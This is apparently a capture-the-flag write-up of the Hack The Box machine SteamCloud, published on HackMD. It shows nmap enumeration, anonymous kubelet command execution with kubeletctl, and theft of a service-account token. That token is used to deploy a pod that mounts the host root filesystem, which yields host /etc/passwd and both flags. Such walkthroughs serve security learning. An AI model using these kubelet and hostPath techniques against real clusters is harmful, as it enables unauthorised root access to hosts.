Try   HackMD

Enumeration

Starting off with a nmap scan:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 17:55 EAT
Stats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 17:58 (0:00:00 remaining)
Nmap scan report for 10.10.11.133
Host is up (0.23s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT     STATE    SERVICE          VERSION
21/tcp   filtered ftp
22/tcp   open     ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
25/tcp   filtered smtp
110/tcp  filtered pop3
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
256/tcp  filtered fw1-secureremote
443/tcp  filtered https
445/tcp  filtered microsoft-ds
554/tcp  filtered rtsp
587/tcp  filtered submission
995/tcp  filtered pop3s
1025/tcp filtered NFS-or-IIS
1720/tcp filtered h323q931
1723/tcp filtered pptp
2042/tcp filtered isis
2869/tcp filtered icslap
3001/tcp filtered nessus
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
8443/tcp open     ssl/https-alt
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 5d6eacd0-54ad-4080-8f1f-395d6aef4b44
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:41 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 3bb3108d-9c18-4648-b946-d2b9627e7d7f
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:39 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 95c89c5c-b2ef-4197-8741-5d5eab22fb65
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:40 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2022-02-15T14:59:41
|_Not valid after:  2025-02-15T14:59:41
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=2/16%Time=620D10AB%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x203bb31
SF:08d-9c18-4648-b946-d2b9627e7d7f\r\nCache-Control:\x20no-cache,\x20priva
SF:te\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20n
SF:osniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1
SF:bb7a5d53b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-
SF:b471-4057191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:39\x20
SF:GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersion\
SF:":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden
SF::\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/
SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(HTTP
SF:Options,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x2095c89c5c-b2e
SF:f-4197-8741-5d5eab22fb65\r\nCache-Control:\x20no-cache,\x20private\r\nC
SF:ontent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosniff\
SF:r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1bb7a5d5
SF:3b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-b471-40
SF:57191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:40\x20GMT\r\n
SF:Content-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\
SF:",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x20Us
SF:er\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/\\\
SF:"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(FourOhF
SF:ourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x205d6eacd0-
SF:54ad-4080-8f1f-395d6aef4b44\r\nCache-Control:\x20no-cache,\x20private\r
SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1bb7a
SF:5d53b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-b471
SF:-4057191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:41\x20GMT\
SF:r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"
SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2
SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/nice
SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"details\"
SF::{},\"code\":403}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.14 seconds

got two ports open , that is port 22 and 8443, and we can see some very interesting information also given from the nmap report:

| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1

Opening the port 8443 on web it gave me this response:

Changing from http://ip:8443/ to https://ip:8443/ gave another type of response:

So I now decide to go ahead with this using python, tho we an easily use curl

req.py













#!/usr/bin/python3
#author : @tahaafarooq#9056
import requests
#import json

host = "https://10.10.11.133:8443/"
headers = {'Content-Type':'application/json'}

req = requests.get(host,verify=False)
res = req.text

print(res)

response

[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py 
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}

To get an even clear output of the json, I used jq:

[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py | jq
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {},
  "code": 403
}

We can see that it's an error message that says user anonymous is forbidden to access the path /, which means we first have to authenticate.

Now on a quick nmap scan , I was able to see multiple ports show up not actually a quick scan but on a scan range of all ports using -p- flag:

PORT      STATE SERVICE
22/tcp    open  ssh
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10250/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

We have etcd which is a kubernetes component , it is listening on port 2379 as client and on port 2380 as server, kubelet is a kubernet extension , which I came to know after searching up the port 10250 on google, and the port 8443 is actually a kubernetes API

Now this makes clear sense! opening up port 10250 using my simple script, it gave me 404 page not found:

[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py 
Enter host url (https://) : https://10.10.11.133:10250/
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
404 page not found

I proceeded to doing dirbusting:

[tahaafarooq@urchinsec-lab steamcloud]$ sudo dirsearch -u https://10.10.11.133:10250/ -e*
[sudo] password for tahaafarooq: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: GET | Threads: 30 | Wordlist size: 9073

Output File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/reports/10.10.11.133-10250/-_22-02-16_18-24-31.txt

Log File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/logs/22-02-16_18-24-31.log

Target: https://10.10.11.133:10250/

[18:24:32] Starting: 
[18:24:34] 301 -   46B  - /%2e%2e//google.com  ->  /google.com
[18:24:34] 301 -   46B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[18:25:29] 301 -   46B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[18:25:30] 301 -   87B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[18:25:39] 301 -   48B  - /debug/pprof  ->  /debug/pprof/
[18:25:39] 200 -   69KB - /debug/pprof/goroutine?debug=1
[18:25:43] 301 -   74B  - /engine/classes/swfupload//swfupload.swf  ->  /engine/classes/swfupload/swfupload.swf
[18:25:44] 301 -   77B  - /engine/classes/swfupload//swfupload_f9.swf  ->  /engine/classes/swfupload/swfupload_f9.swf
[18:25:45] 301 -   62B  - /extjs/resources//charts.swf  ->  /extjs/resources/charts.swf
[18:25:52] 301 -   72B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf
[18:26:02] 301 -   41B  - /logs  ->  /logs/
[18:26:03] 200 -    2KB - /logs/
[18:26:11] 200 -  179KB - /metrics

and I found that interesting folder logs I accessed it on the web, and there are alot of folders and log files which are very interesting.

And among them was /logs/pods/ this means I can basically extract all the pods.

And there we have it all the pods from kubernetes cluster

Initial Access & Foothold

The api running on the port 8443 , is actually undocumented meaning that we dont know what requests and how the data is arranged and what parameteres are set with what values to be sent. But fortunately we can still use kubectl to interface with it and get inside the pod.

and with the command kubeletctl --server ip pods we can see the pods available, so now for the foothold part, I scan for rce with the command kubeletctl --server ip scan rce which will allow me to know if I can run commands on available pods

We can see that , we can actually run commands on the nginx pod and the kube-proxy-j487c pod

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)

Privilege Escalation

Now that we have possible RCE, but on a pod, my next approach is to get access to the token needed for authentication and the certificates ,which will allow me to create a service account with higher privileges.

alright we have the certificate and the token, we can just log in to kubectl

[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          68m

I now list privs that I have on the default service account:


Okayy, it seems that I can create a pod in the default namespace as well as get a pod and just list them as did before.

My approach right now is to create a pod , where I shall have to use the nginx image, I wrote my basic simple configuration file:



















apiVersion: v1
kind: Pod
metadata:
  name: sample
  namespace: default
spec:
  containers:
  - name: sample
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: rooty
  volumes:
  - name: rooty
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

That I shall use to create the pod:

[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f sus.yaml
pod/sample created

[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME     READY   STATUS    RESTARTS   AGE
nginx    1/1     Running   0          81m
sample   1/1     Running   0          18s

and we can see that it's already up and running!

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p sample -c sample
uid=0(root) gid=0(root) groups=0(root)

I try getting the root flag :

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root.txt" -p sample -c sample
cat: /root/root.txt: No such file or directory
command terminated with exit code 1

So I now take a look at /etc/passwd

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /etc/passwd" -p sample -c sample
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false

I couldn't see a user with /home/ , so I'm assuming both users are in /root/

USER FLAG

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p sample -c sample
c65246eb8f02a2366f02877d567c1265

ROOT FLAG

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root/root.txt" -p sample -c sample
3370f968dc760bd1ca95dd701be8b520

contacts : tahaafarooq

Last changed by 
Tahaa Farooq
お前はもう死んでいる
0
3
1413

Read more

UnderPass Hackthebox Writeup

An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀

May 10, 2025
Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
File Transfer Tricks

As a penetration tester, you have happened to gain access to a few target hosts (windows & linux) within the scope of your engagement and you are now required to transfer some files from your host to the target's host and vise versa, what do you do?

Jan 13, 2025
Read more from Tahaa Farooq
Published on HackMD